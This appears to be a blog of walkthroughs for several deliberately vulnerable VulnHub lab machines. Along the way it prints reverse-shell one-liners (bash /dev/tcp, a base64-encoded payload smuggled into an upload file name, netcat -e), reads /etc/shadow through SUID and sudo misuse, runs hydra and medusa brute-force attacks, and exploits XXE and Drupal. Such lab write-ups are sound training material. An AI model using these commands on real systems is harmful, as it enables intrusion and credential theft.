VulnHub Unknowndevice64 Walkthrough

Unknowndevice64 is a relatively easy VulnHub box. It requires some obscure decoding but other than that it’s fairly simple to work through.


We start off as usual with an nmap scan. Nmap -sC -sV -v -oN map1


We only find one port here and it’s a web page. Let’s see what it is.


So kind of a cool flashlight effect. Here I found something that looks like a possible password. I’ll note that for later. For now let’s look at the source.




Now we see there’s a file and another reference to a key. Let’s look at the picture file.


Ok. We have a picture file called key_is_h1dd3n.jpg and the picture itself is called HIDDEN SECRETS. We also have a potential password of h1dd3n which is also in the file name. This smells like steganography to me. Let’s download the picture and see what we can find.

To look for a hidden message, we’re going to use a program called steghide. After looking at the help file, cause I don’t do this a lot, I figured out this command to extract the text: steghide extract -p h1dd3n -sf key_is_h1dd3n.jpg

This provided me with some wonderfully obscure text: ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.—————–.<—————-.–.++++++.———.>———————–.<<+++.++.>+++++.–.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.—————–.



Ok so what the heck is this? It kind of looks like garbage, but I know it’s right because of all the hints and the fact that the password works. So maybe it’s encoded in some way? Google can help with that. I put decode and the crazy string into Google search and the top result was quite interesting.



Yep I’m not making this up folks. This apparently is a thing. Classy …




After putting the string into the interpreter, the result comes out ud64:1M!#64@ud

That’s great, we have creds …. But we don’t have anywhere to use them. Let’s do another nmap scan on all the ports.

Nmap -p- -sC -sV -v -oN map2


Now we have a new port and it’s SSH. Let’s try to log in. Since it’s not on a standard ssh port, we’ll have to use the -p flag


Great! We’re in!! Let’s look around.


Only we can’t because we’re in a restricted bash shell. ☹

Luckily, we got in with SSH. That means we can bypass this restriction as we log in.

For this we use the -t option. According to the man page, it forces a pseudo-terminal allocation. In this case, it also bypasses the rbash restriction and runs bash normally.


Now that we have a prompt, one of the first things to check is sudo permissions. Sudo -l


Well I have no idea what this is, so I looked at the help file.


It really doesn’t explain what it does, but the fact that it will run a command as a user I can choose was very interesting. Let’s try to cat the shadow file with it.

sudo /usr/bin/sysud64 -u root cat /etc/shadow


Well the output was strange, but we did get the shadow file. Now you could try to crack the root password, but it’s a lot easier just to get a root shell. Let’s run bash this time!


Ok this is truly strange output. While it’s hard to show here, commands do still work. Let’s run bash again from here and see what happens.


As we type bash, the letters show up one character at a time. Once the command processes, we get a normal shell and we are root!


Now let’s go for the root flag.



Awesome! And that finishes off unknowndevice64. I hope you enjoyed the walkthrough. If you want to see a video walkthrough, you can find it here.


Happy Hacking,


VulnHub DC: 1 Walkthrough

This VulnHub walkthrough is a box called DC: 1. It’s rated as a beginner box and it’s really not too difficult.

We start off by running our typical nmap scan: nmap -sC -sV -v -oN map1


There are a few ports listed here but the most interesting one is port 80. Let’s look at the website.



Ok it’s a Drupal site which confirms what Nmap found. Nmap also noted that the version was 7. Let’s see if we can find a more exact version. I’ll use droopescan: droopscan scan drupal -u



It takes a few minutes to run, but it gives us a list of possible versions between 7.22 and 7.26. Let’s see if any exploits exist.



Searchsploit returns a ton of results most of which center around the Drupalgeddon exploits. I successfully exploited the site with three of the exploits:, 44449.rb, and a Metasploit module.

For this walkthrough, I’m just going to show the Metasploit route. I’ll have a video walkthrough up soon where I’ll show all three ways. The privilege escalation is the same either way.

So let’s start up Metasploit and search for drupal.


Next, we’ll set the rhosts to the site IP address



Now, we’ll launch the exploit to get a shell.


Now that we have a shell, we can work on privilege escalation. There are a couple ways to discover the path. By running a Linux privilege checker, or by finding a hint (in the form of a flag) on the Drupal site.

I’ll use the checker for this walkthrough. So start up a python web server and use wget to download the file. I also upgraded the shell using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’dc8

python -m SimpleHTTPServer 80



Then run the checker script.


The hard part about doing it this way is that it’s really easy to miss it. You also might not know that find has an exec flag that lets you run commands on what you find.


The other way to find this would be to get the mysql password form the Drupal config, find the user password hashes, and crack them. That would lead you back to the Drupal site where you could find the hint.

All that to say is that the find command has the suid bit set which will let us execute code as the owner – in this case root.

Let’s test it out.

find /etc/shadow -exec cat {} +


If you only had a webshell at this point, you could crack the password for the flag4 user account and log in with ssh. That’s not necessary to get root or even view the root flag. Find can do all that for us (I’m still using /etc/shadow here because something has to fill the spot. It really doesn’t matter what. An empty text file would work too.)

find /etc/shadow -exec bash \;


Hmmmm … what happened here? We should have been root. Let’s try it again with sh.


Now we’re root! But why didn’t it work with bash? Let’s find out.


So it looks like running bash will actually put you in a restricted bash shell. That’s not the case with sh.

Anyway, we can now go to the root folder and view the flag.


So that was DC: 1 from VulnHub. I hope you enjoyed the walkthrough. I’ll have a video up soon that walks through the other methods to get a shell.

Update: The video can be found here

Happy Hacking!




VulnHub Casino Royale Walkthrough


Today we’re going to walkthrough Casino Royale from VulnHub. This was a really fun box to work through and very relevant to people working there way to OSCP. It was actually a lot harder to get into the box than to escalate privileges once there. If you’d like to see a video walkthrough of it, you can find it here.

As usual, I start off with a Nmap scan – nmap -sC -sV -v -oN map1


There’s already a lot of information here to check out. FTP is usually interesting, but in this case anonymous login is not allowed. We’ll come back to that later. Let’s check out the websites first. I’ll start with the one on 8081.



Ok to this site is interesting, but it doesn’t seem to do anything. Note the collect.php. That will be valuable later. We’ll move on to the main site on port 80.


Alright, so Bond is raising his martini. Let’s check out a couple of those directories nmap pointed us to.


Kboard is just some flavor. Let’s check out cards.


Just more flavor, but in color this time. Let’s look for some more directories with gobuster.

Gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u


Gobuster found some new things to investigate. We don’t have any user names or creds for phpMyAdmin, so let’s check out install.


Ok now we’re getting somewhere. It looks like a low version so let’s see if it’s vulnerable.


It is vulnerable and once executed, will give admin access to the site. Before we can try it out, we’ll need to find the login page. The pokerleague/pokeradmin/configure.php path doesn’t exist, but pokeradmin does. Putting in configure.php gives us a redirect to index.php. Anyway, we found the login page.


There are a couple ways to get the exploit to work. The simplest way is to paste the exploit into the URL. Like literally replace the URL with the javascript code.



When you paste it in it will get rid of the javascript portion so you’ll have to retype that. The other way to do it is to use the web developer tools. There’s a command line section that the script can be written in. It doesn’t like copy and pasting either, so you’ll have to allow it or just type it in.


Once you hit enter, the cookie will be set which will allow you to just bypass the authentication page. Please note that you’ll have to go back to the configure.php page, not the index.php page.


Once in, you’ll see a reference to a domain name. Add that to the /etc/hosts file. Looking at the Manage Players section gives us a list of user names. One of them has an email link.



Let’s look at some of the info tabs (especially Valenka’s).



In her profile is a link and another reminder to update your hosts file. Let’s visit the site and see what’s there.



It’s a blog site with Snowfox CMS. At the bottom of the page is a big hint that we should send a malicious link to Valenka soon. Before that, let’s see if there are any vulnerabilities with snowfox.




Once again, the site is vulnerable and sounds like it will fit our scenario. To make this work we’ll need to do a few things.

  • Create a webpage with the modified exploit to fit our scenario
  • Send an email to Valenka with the link to the exploit page using a name from the user list in the subject
  • Login with our newly created admin user.

So we’ll start off by creating a web-page. Here I made one called exp.html and put it in my /var/www/html directory. Then I started my apache server by using systemctl start apache2. I had some trouble getting this exploit to work properly. My assumption is that my initial password was too short and was getting rejected. Once I made it longer, it seemed to work fine.


Now that our web-page is up, we can send our malicious email. Remember the smtp server on port 25 from the nmap scan? Now we’re going to use it.



I used netcat, but telnet will work just as well. Obanno was the only user that worked for me. I couldn’t get Le to work even though that was the most logical choice. Anyway, you can watch your logs at /var/log/apache2/access.log to see when/if Valenka hits your web server. Once she does, you can login with the user name and password you set in the exploit.


Once in, check out the users page inside the admin dropdown.


Then look at Le’s account. Inside you’ll find a new link.


Let’s check it out.


Not much here, but let’s look at the source.


Here it gives a couple of hints on how to move forward. I wasn’t sure what they were talking about with the curl request so I did a google search on XML post request exploit. It brought me to this page about XML External Entities (XXE) and then I realized why they had the funky capitalization in the comments.  It also gives a hint about the FTP account which will come into play soon.



This blog has an excellent write-up on XXE. The code they use is exactly the same as in the casino-royal blog site. The only confusing part for me was what to actually send. The XXE blog gives the curl command and code you’ll need, but I was still confused. Once I understood what the exploit was doing, I realized I needed to make some modifications.

First off, the file you create must be called xml.txt or it won’t work.

Second, the casino-royal site gives you some very helpful hints. Unlike the blog page, which uses consistent naming conventions, casino changes the variable names. These must be updated in our PoC code as well.


In the end, the code should look like this


The given curl command should work now.

curl -d @xml.txt http://casino-royale.local/ultra-access-view/main.php

The output should contain the /etc/passwd file and we now have file read access to the system.


Here we can also see the custom ftp user. Since they said the password was easy, let’s try to brute force it with hydra.

hydra -l ftpUserULTRA -P /usr/share/wordlists/fasttrack.txt


It doesn’t take very long to come back with the password bankbank. Let’s login and see what’s there.



Hmmm … main.php looks familiar. Let’s try battle2root.html on the Client Access: ULTRA page and see what happens.


Ok so we know that this ftp directory is accessible from the web and we can actually see the entire directory view from the web if we just view the root of the page.


If we try to upload files, most will be rejected. Apparently, there are some file restrictions in place. One type that is not restricted is perl.

Let’s upload a perl webshell and see if it works. Doing a locate on webshell in Kali will reveal a directory with some perl webshells ready to go. I’m using the one called but renaming it to for short.

We don’t have to modify it, but we do have to give it at least read/execute permissions after we upload.


Now when we go to the site we should see our file.


Now let’s try to execute a command.


It works! Now that we have command execution, let’s try to get a real shell.

We can tell that python is installed by issuing the command which python. The command is successful so let’s upload a python reverse shell.


Using the (one line) command this way, I’ll have to make it bash script, change permissions, and then run it. We can also just upload it as a python file and run it as python.


I started a python http server (python -m SimpleHTTPServer 80)  and used wget in the browser to transfer the file.


Then I started a netcat listener (nc -nlvp 7777) and ran the python script.


Once ran, I had a shell!


That took a lot of work, but we finally have access to the box. Let’s upgrade our shell with python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

We’re going to be manipulating code so you’ll also want to:

Ctl z                            to background the session

stty raw -echo        (enter)

fg                              (enter)

This will give you tab auto complete, up arrow history, and ability to ctl c without killing your shell.

At this point, we can do a locate on This is the file that stores phphmyadmin passwords. It shows up in a few places, but eventually we get Valenka’s user password.


It turns out that this is irrelevant as switching to her user account is actually less helpful than staying in www-data. That will become apparent later. If you were savvy enough to guess the location at the XXE stage, you potentially could have used phpMyAdmin to get a shell and skip the ftp portion.

At this point, you can search around the file system looking for interesting things, running privilege escalation scripts and whatever post exploitation things you like to do. One thing I noticed is that I didn’t see any scripts relating to the port 8081 that we found at the beginning.  So I did a locate on collect.php. It’s in the opt/casino-royal directory which you also could have easily stumbled upon.

Let’s see what it does.


This script calls a python script that’s also in this directory. Let’s look at that one.


This opens a data log that displayed the message when we clicked the run data collect button. Let’s look at the file permissions for these scripts.


Here’s where the domino’s start to fall. We have write access to casino-data-collection which is called by collect.php which is triggered by hitting the website button. Since le is the only person with execute permissions our assumption will be that if we inject a shell into casino python script, and press the collect button, we can get back a shell as le. Let’s give it a shot! Nano doesn’t work so we’re stuck with vi ☹ It’s a good thing we upgraded our shell or vi would be more of a pain than normal.


Remember the python script we used earlier? Well we get to use it again here (make sure to change the port number). Exit with :wq!   😊



Now we set up a netcat listener (nc -nlvp 8888) and press the button.


Awesome! We are now le. This is a good time to upgrade your shell with python again.

Now we have more privileges with the scripts that are in this directory

One thing I forgot to mention earlier is that I ran the mi6_detect_test as www-data.


It seemed to output some connections using netstat.

As le, we have access to a new script call and when we run it look what happens.



Notice any similarities? The detect script is calling The main difference is that the detect script is running as root! Just like before, if we change the code in with shell code, and run the detect script, we should get root. Let’s fire up vi one more time and put in our code.

Since this is a bash script, our oneliner will work better.


Now we start a listener one more time (nc -nlvp 9999), and run ./mi6_detect_test




Inside the root folder is a flag folder containing a bash script. Run it for the reward.



And that was Casino Royale! I thought this was a great box to work on and I learned some new hacking techniques (which is always the goal). Hopefully the walkthrough was helpful.


VulnHub Goldeneye Walkthrough

In this walkthrough, we’ll be looking at Goldeneye from VulnHub. This one was a lot of fun simply because of the flavor. It felt a lot like the OSCP labs as well. So let’s get started!

A typical Nmap scan reveals a few ports – 80 and 25.


nmap -sC -sV -v

We’ll check out the webpage but first let’s get another scan going in the background

nmap -sC -sV -v -p-

This will search for all ports not just the top 1000 while we do other things.

Navigating to the webpage gives us a fun taste of the box theme.


It also gives a directory to browse. Let’s see what’s there.


Well we don’t have any creds to try right now so we’ll come back later. Let’s look at the source of the home page first.


There’s not much here but let’s see what terminal.js is.

Here we have something interesting. It looks like we have two user names and one encoded password.


I’m going to use BurpSuite to decode it. Once BurpSuite is open, navigate to the Decoder tab and paste in the encoded string. Then click on the Decode as drop down on the right and select HTML. This reveals the password of InvincibleHack3r.


Now let’s try that login again.


It works and we get some more fun stuff and some hints. It’s a good thing we have our scanner going.

Before we leave let’s check the source of this page. Not much is here but at the bottom we do find out that Boris and Natalya are supervisors.


Now let’s go back to our nmap scan and see if it found the pop3 ports.


It looks like it did. Unfortunately, the password for Boris doesn’t work.

At this point, we have things we can do and since they might take a little time, let’s get them going at the same time.

First, we’ll get a pop3 brute force going. This is actually where I first ran into trouble. It’s very important to pick a good wordlist here. A lot of times I’ll just use the rockyou wordlist and go do something else while it churns away. In this case, it’s not an option. Hydra will crash after a couple minutes but it will give a suggestion to use a shorter wordlist (this is critical). Medusa won’t crash but it will throw errors and recover so I went with Medusa instead.  The problem is still a short password list. I ended up using a password top 10,000 from SecLists, but even that was too big, and I missed out on getting the password for Boris. His password wasn’t critical though. The password list that ultimately works the best in this case is called fasttrack.txt. It’s native to Kali unlike SecLists which is cloned from GitHub.

Ok so now we have a wordlist, but we need to pick our users. We could do all of them since the list is so short, but the webpage said Boris and Natalya were the administrators to send email to. The nice thing is that we can check their names first. Remember the smtp server on port 25. Let’s see who’s valid.

Using netcat (nc -nv 25) we can log into the smtp server. Using vrfy USERNAME we can check the response from the server. Boris and Natalya come back but the others do not. There no sense wasting time brute forcing users that don’t exists so let’s just create a text file with there names only.


Now we can use hydra or medusa to run through the password list.

hydra -L users -P /usr/share/wordlists/fasttrack.txt pop3://


medusa -U users -P /usr/share/wordlists/fasttrack.txt -h -n 55007 -M pop3 -t 16

With hydra, you’ll want to keep the user names separate because it will crash. At least it did for me, and it won’t recover. Doing one at a time, it won’t run into issues before it finds the passwords.


Medusa will also have issues, but it will recover and continue, and you can do both names together.


Either way, after a couple minutes you’ll have passwords for both Boris and Natalya. For all Natalya’s trash talking, her password is actually worse than Boris.



Anyway, we’ll just let the brute force run while we do this other stuff.

Next we can start gobuster on the website to see if there are any other hidden directories. gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u (It won’t find anything)

Finally, we’ll start a nikto scan on the website while we guess passwords. nikto -h

This finds a fun page called /splashAdmin.php which gives us some more potential user names and a really good hint we’ll need later.

Users – Xenia and Janus

Hint – GCC is replaced with the FreeBSD alternative (A quick google search shows this as cc.)


By now our password brute force should be finished and we can put those credentials to good use.

Let’s log into the pop3 server and check out some emails.

nc -nv 55007
user boris
pass secret1!
Retr 1
Retr 2
Retr 3


There’s some fun theme stuff here, but nothing important. Let’s do the same with Natalya’s account.


Now we’re getting somewhere. We have a new page to check and some account creds. You will have to edit the etc/hosts file first as the email suggests. Then navigate to the site.


At the bottom of the page you can find it’s running moodle. Once logged in it looks like there’s a message from Dr. Doak. Clicking on the contact information shows that his email username is doak.


Let’s see how secure his password is.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://


These secret agents really need to pick better passwords. Well let’s see what’s in his email.


Ok now we have some admin creds. Let’s log back into the website with these and see what we can find. Inside a page called My private files is a secret.txt file. Let’s see what’s in it.



Let’s view the file


Hmmm … that doesn’t seem too special. Maybe there’s more to it. Let’s download it and see what else we can find.

We can either run file or exiftool. Either way a base64 encoded string can be found in the image description.


Decoding this reveals a password for the admin account.

echo eFdpbnRlcjE5OTV4IQ== | base64 -d


Let’s log in one more time as the admin.


Now we can easily identify the Moodle version.


A quick Google search reveals that this version is exploitable and there’s a Metasploit module for it. You could also just search for it in Metasploit.


There is one important thing to point out with this module. The target id must be set manually. I know it says 0 is automatic, but it doesn’t work right and will fail. So just set the target to 0 before you run the exploit.


There’s one more thing you’ll have to do to get this to work. The spell check engine must be set to PSpellShell. If you look at the exploit code, it looks like this should be set during exploitation, but it’s not and you have set in manually.



Once this is set run the exploit and you should get a shell.


Now I’ll upgrade my shell using python. It’s not really necessary for this box, but it’s still nicer to work with.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

There are a couple scripts I usually download and run at this point, but it turns out they are not super helpful. The exploits are there but buried. It was much easier to find by enumerating the kernel manually.

uname -a
cat /etc/lsb-release


The first search that pops up looks like it fits.

It’s C code so let’s use GCC and compile it on our box.

gcc 37292.c

It gives some warnings, but it looks like it compiled. Let’s see if it works.


I stated a python server and used wget to transfer the file.

Attcker box: python -m SimpleHTTPServer 80
Victim box: wget
Chmod +x a.out


When we run it, it doesn’t work. One of the error messages is gcc: not found.

That’s odd right? Let’s look at the code and search for gcc.


So the code is compiling something else when it runs. Remember the hint about gcc being removed. The compiler on this box is cc. Let’s change the compiler in the code to cc and see if it works.

Just FYI: the script may freeze the shell. If it does, you’ll have to manually clean up the files and directories left by the exploit before trying the new version.

Once the new version using cc is run, a root shell spawns.


The root flag is hidden. Use ls -lah to find it.


The final reward is in a web directory you might have found earlier, but if not, take a look at the ending scene.


Well that was Goldeneye. The word list thing was a little frustrating, but theme of the box was really fun. Anyway, I hope you enjoyed the walkthrough. If you’d like to see a video walkthrough you can find it here. In the video, I also show how to get a shell without using Metasploit.

Happy Hacking!


Vulnhub Toppo Walkthrough


Today’s writeup is a machine called Toppo from Vulnhub. Toppo is rated at beginner level and is fairly simple to root. Depending on how you go about the privilege escalation, it could throw you off a bit.

I started off by running a typical nmap scan (nmap -sV -sC -v -oN map1). It has SSH and Port 80 open. Let’s check out the web page.


Here we have a blog site, but not much else. Let’s run a directory brute force to see if anything else can be found.


Running gobuster provides us with an interesting admin directory. Gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u



In the admin directory are some notes.


The notes give us the user name and password for something. Let’s try it out on SSH.


SSH worked!


Checking some basics like the bash history and sudo permissions doesn’t yield anything. So I used wget to bring over and ran it.

python -m SimpleHTTPServer 80



When running the script something interesting happened. It said I was already root.


What’s happening here is that python runs as root. This means that if we spawn a shell with python, we can be root too.

python -c ‘import pty; pty.spawn(“/bin/bash”)’


Ok so what went wrong? The script clearly ran as root (it even dumped the shadow file), so why didn’t we get a root shell? Somethings not right. Let’s try it again with sh.


Ok that worked. Now we’re root. It looks like bash will always run under the context of the ted user, but sh works normally. Now we can get the flag.


That’s Toppo. It’s a basic and quick box to pop. If you used sh with python from the start, you’d completely miss the weird bash issue. Another way to do it would have been to spawn a python reverse shell. Alternatively, it might have been possible to crack the root password from the shadow file dump (after running linuxprivchecker), but I didn’t try it.

If you’d like to see a video walkthrough with the python reverse shell, you can find it here.

Hope you found this helpful.


Vulnhub Raven 2 Walkthrough


Well I did Raven 1 a while back, so I decided to give Raven 2 a try. It proved to be a lot more challenging.

I started out doing the nmap scan: nmap -sC -sV -v -oN map1

This listed an open webpage similar to last time.


Next I opened up a web browser and navigated to the page. I’ll also say that I prepped my box by adding raven.local to the /etc/hosts file. It’s not critical, as the exploit doesn’t need it, but it does help while you’re just navigating the web pages.

The page looks identical to Raven 1.


Running nikto against it shows that WordPress is still available (nikto -h This, however, is a rabbit trail. Trying to brute force the users like in Raven 1 won’t get you anywhere and will take a long time.


To find other directories, I like to run gobuster (gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u

A directory called vendor sticks out.


In the vendor directory is a file called PATH. Let’s see what’s in it.


Inside is the first flag! It also shows the path to the web root. It’s common but we’ll make note of that for later.


Also in the vendor directory is a file called VERSION along with a lot of references to phpmailer.


The version appears to be 5.2.16. Let’s look to see if it’s vulnerable.


Using searchsploit (searchsploit phpmailer 5), I found several exploits for that version of phpmailer including a Metasploit module. The problem is that all of them failed out of the box. I ended up choosing the .pl exploit for reasons I’ll explain below.


Since none of my other enumeration provided any optional paths, I felt fairly strong that this was the way in. I just needed to figure out what was breaking the exploits.

First, I wanted to see what the web request looked like. BurpSuite helped me out there.


One of the things I clued in on right away is that the request variables were not the same as in the exploits and one was missing (the subject).

After reviewing the exploit code, it became clear that I needed a few things. I needed to edit the post fields to match what’s in Burp and I needed a read/writeable directory that was accessible to the web. I chose the .pl file because the code was simple and I could easily edit those fields along with the payload. There were two types of payloads built into this exploit. Other exploits, like Metasploit for example, didn’t have all of those as an option and I didn’t want to dig into the back end of the exploit. The funny thing is that this code is not written in perl. It’s clearly python.


The original code looks like this:


The highlighted items are all things that need to be adjusted. The php code will work fine for a test, but we’ll have to change that to exploit the box.

I changed the URL to the contact page, the php code to a command shell, set the action to submit, the name to r3a50n (I wasn’t sure if a space would cause an issue), and added a subject. I also uncommented out the first payload as I thought that was more applicable.

The read/write directory did take some discovery.


The original code put the RW directory in uploads. The problem here is that there wasn’t an uploads directory. WordPress had one though. There’s even a flag hidden there.


This seemed like a good hint for a writable directory, so I tried it out. It failed. I then tried everything along that path, backing up one directory every time. Finally, I had success in the web root directory.

My final code looked like this:


Once I launched the exploit, the code was in place.


Now we can test for code execution. By adding ?cmd=id we can see if the code executes. Viewing the web page source will make it a lot easier to read.


We have code execution. Now let’s try to get a shell. Luckily for us, a version of netcat is installed that allows reverse connections to get a shell. That makes it easy. I started up a listener (nc -nlvp 9999) then ran ?cmd=nc -nv 9999 -e /bin/bash in the command shell.

Once I hit enter I had a shell!


Now I needed to upgrade it.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Ctl z

stty raw -echo



Now we have up arrow and ctl c just like a regular shell. This will be really nice later when we need to access the MySQL database

Next we’ll send over linuxprivchecker to help with privilege escalation

Set a python webserver in the directory with the priv checker script


I then moved to the tmp directory since it’s typically world writeable and used wget to transfer the file.


… And then I ran it.

Two exploits came to the top of the list. One I ruled out since it required a brute force of SSH keys and this box uses password only. The other one looked like a good candidate but we need to get the MySQL database password first.


Inside the WordPress  directory is a file called wp-config.php. This file usually contains the password we need.

Cat wp-config.php | grep password -A2 displays the password R@v3nSecurity


Now let’s test it out. If you were wondering why upgrading the shell is so important, this is why. Accessing MySQL will not work in a basic shell.

Type mysql -u root -p then put in the password when prompted. This should bring you to a MySQL prompt.


In here we could extract and crack WordPress passwords, but that won’t help us at this point. For now, we can just log out of MySQL by typing quit and work on getting the exploit working.

The first thing the exploit needs is to be compiled. Gcc isn’t on the raven box so I had to compile it on my Kali host. The exploit does a good job of walking through the commands which makes it so much nicer. As nice as it is, there’s still a typo. The W1 (as in the number one) is actually Wl (as in lower case L).

After following the commands in the exploit, you should end up with a file ending in .so. Copy that file over to the raven box using python web server and wget as before.


Then continue to follow the exploit instructions using mysql.

Eventually the commands will produce an error.


The error states that it can’t fine the file and gives the path where it’s looking for it. To fix this issues, just redo previous select statement with the path provided in the error. It should read something like: select * from foo into dumpfile ‘/usr/lib/mysql/plugin/’;

Now when we run the command again we get no errors.


With that in place we should be able to run commands as root. Let’s try out the proof.


That worked! Now to get a root shell.

I just spawned another netcat listener and used the same netcat shell as before on port 8888


The command hangs as soon as it’s entered, but back in our shell window we get a connection as root!


I used python to upgrade my shell again (not necessary but it’s just nicer).

Then I went for the root flag.


That ends Raven 2. It was significantly more difficult than Raven 1. Raven 1 was basically brute force a password and then sudo for root. Version two required a lot more effort which I honestly was not expecting. Anyway, I did learn some things, which is always the goal, so that’s good.

Update 2/24/2019: I finally uploaded a video walkthrough. You can view it here. I struggled at the end because of a stupid copy/paste error but I eventually get there.


Dina Walkthrough


Hi All,

This post is a walkthrough for Dina 1.0.1 on Vulnhub.

Dina uses DHCP so you’ll have to figure out what the IP is. Using netdiscover -r IPRANGE will help you with that.

First thing to do is to run a nmap scan … nmap -sC -sV -v IPADDRESS -oN OUTPUTFILE


There’s not much to go off of except a webpage. It does list the directories from the robots.txt file. Let’s go to the webpage and see what’s there.


Not much here even when looking at the source. Let’s try some of the robot.txt directories.


This is not a normal error message. Let’s look at the source.


Ok so this is interesting. Somebody thought it was a great idea to put a bunch of passwords in the source of the webpage. This is a very simple example of security by obscurity and it doesn’t work. Unfortunately, we don’t have anything to try the passwords on. The other robot.txt directories didn’t turn up anything. Let’s do some more enumeration.

Running nikto on the site (nikto -h IPADDRESS) gives us some more directories to look at. One of them is called secure … that might be interesting.


Inside the secure directory is a file called I couldn’t unzip it with native Kali tools, so I put it in Windows and used 7zip. It prompts for a password. Luckily, we have a few to try.


The first password in the list (freedom) worked and I was able to extract the mp3 file. Sometimes in CTFs, they put challenges into audio files. I was all prepared with my audio editor except the file wouldn’t load. It wasn’t an mp3.


Running file against the mp3 revealed that it was just a text file.

I renamed the file to a text file and took a look at it.


This gives us a user name and a new url with a login. Let’s check it out!



On the page is something called playSMS. Using the user name touhid and running through the password list from earlier, I was able to login with the password diana.



At this point, I looked for places to upload files or code. There was one place that allowed a file upload, but the file itself never really wrote to the system. I went to Google and searched for playSMS exploits and I found one in exploitDB. There are also two Metasploit modules that work on this VM. The manual way is more interesting though, so I’m going to show that method. If you can’t get it to work, go the Metasploit route.


The key here is the filename. After the upload, the system will display the filename. If the filename contains php code, the code will execute. In the example they are running the system command uname -a. Let’s try it and see what happens.



Now we have code execution! The only problem is that slashes / are not allowed in files names. That makes it really hard to get a reverse shell. They system does have netcat, but it’s not a version with the gaping security hole (-e flag). The solution is to encode the command string and get the system to run it on the other side.

First, let’s find a reverse shell to use. I used this from pentestmonkey: bash -i >& /dev/tcp/ 0>&1

Now echo that into base64: echo “bash -i >& /dev/tcp/ 0>&1” | base64

This gave me YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== as the encoded string. Yours will be different based on the IP address and port number.


So now we have an encoded string that should give us a reverse shell. Now we need to set up the filename to decode and run it on the other end.

Inside the single quotes where we had uname -a, we’re going to replace that with: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash

What we’re doing is echoing the string, piping it into base64 (decoding it with the -d flag), and finally piping the string to bash for execution.

Now we need to get our listener setup: nc -nlvp 7777


Once the file is uploaded, we get a shell!


The first thing I do after this is spawn a better shell: python -c ‘import pty; pty.spawn(“/bin/sh”)’


Now I can do things like sudo. Let’s check our sudo permissions with sudo -l.


This is awesome! We can run Perl commands as root. Googling for reverse shells, I easily found this one using Perl: perl -e ‘exec “/bin/bash”;’

The only change is that we’ll have to use the full path to Perl for this to work.



Navigating to the root directory and viewing the root flag is now possible.


That’s the box. It was definitely beginner level especially if using Metasploit. Hopefully you found it helpful.

If you want to see a video walkthrough where I also show the Metasploit path, you can view it here on YouTube